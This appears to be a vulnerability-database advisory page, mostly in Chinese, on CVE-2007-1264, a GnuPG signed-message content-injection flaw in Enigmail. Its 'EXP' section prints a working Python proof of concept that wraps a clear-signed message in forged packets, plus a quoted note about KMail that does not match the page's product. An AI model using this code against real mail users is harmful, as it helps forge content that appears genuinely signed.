Enigmail GnuPG 任意内容注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112364 漏洞类型 设计错误
发布时间 2007-03-05 更新时间 2007-03-06
CVE编号 CVE-2007-1264 CNNVD-ID CNNVD-200703-215
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29690
https://www.securityfocus.com/bid/22758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-215
|漏洞详情
当调用GnuPG时,Enigmail0.94.2及之前版本没有正确的使用--status-fd自变量,这会导致Enigmail很难被区分带有多组件的OpenPGP信息的署名部分和非署名部分。远程攻击者可以在不接受检测的情况下,伪造信息内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/22759/info

KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing.

An attacker may be able to exploit this issue to add arbitrary content into a GnuPG signed and/or encrypted message.

This vulnerability is due to the weakness discussed in BID 22757 (GnuPG Signed Message Arbitrary Content Injection Weakness) and has been assigned its own BID because of the specific way that KMail uses GnuPG.

This issue affects KMail versions prior to and including 1.9.5. 

#!/usr/bin/python
import os, gpg, sys, base64

clear_sign = open(sys.argv[1], "rb").read().splitlines()

start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----")
end = clear_sign.index("-----END PGP SIGNATURE-----")

text = '\r\n'.join(clear_sign[start+3:mid])
sign = '\n'.join(clear_sign[mid+3:end-1])

onepass = gpg.OnePassSignature()
onepass['keyid'] = (0x12341234,0x12341234)
onepass['digest_algo'] = 2
onepass['pubkey_algo'] = 1
onepass['sigclass'] = 1

plain1 = gpg.Plaintext()
plain1['name'] = 'original'
plain1['data'] = text
plain1['mode'] = 0x62

signature = gpg.Raw()
signature['data'] = base64.decodestring(sign)

compressed = gpg.Compressed()
compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB
compressed['data'] = [onepass, plain1, signature]

pkt = gpg.Packet()
pkt['version'] = 1
pkt['data'] = compressed

os.write(1,str(pkt))
|受影响的产品
Mozilla Enigmail 0.94.2 Mozilla Enigmail 0.92.1 Mozilla Enigmail 0.91 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390
|参考资料

来源:MISC
链接:http://www.coresecurity.com/?action=item&id=1687
来源:BID
名称:22758
链接:http://www.securityfocus.com/bid/22758
来源:BUGTRAQ
名称:20070305CORE-2007-0115:GnuPGandGnuPGclientsunsigneddatainjectionvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/461958/30/7710/threaded
来源:BUGTRAQ
名称:20070305CORE-2007-0115:GnuPGandGnuPGclientsunsigneddatainjectionvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/461958/100/0/threaded
来源:SECTRACK
名称:1017727
链接:http://www.securitytracker.com/id?1017727
来源:VUPEN
名称:ADV-2007-0835
链接:http://www.frsirt.com/english/advisories/2007/0835
来源:SREASON
名称:2353
链接:http://securityreason.com/securityalert/2353
来源:SECUNIA
名称:24416
链接:http://secunia.com/advisories/24416
来源:MLIST
名称:[gnupg-users]20070306[Announce]MultipleMessagesProbleminGnuPGandGPGME
链接:http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.html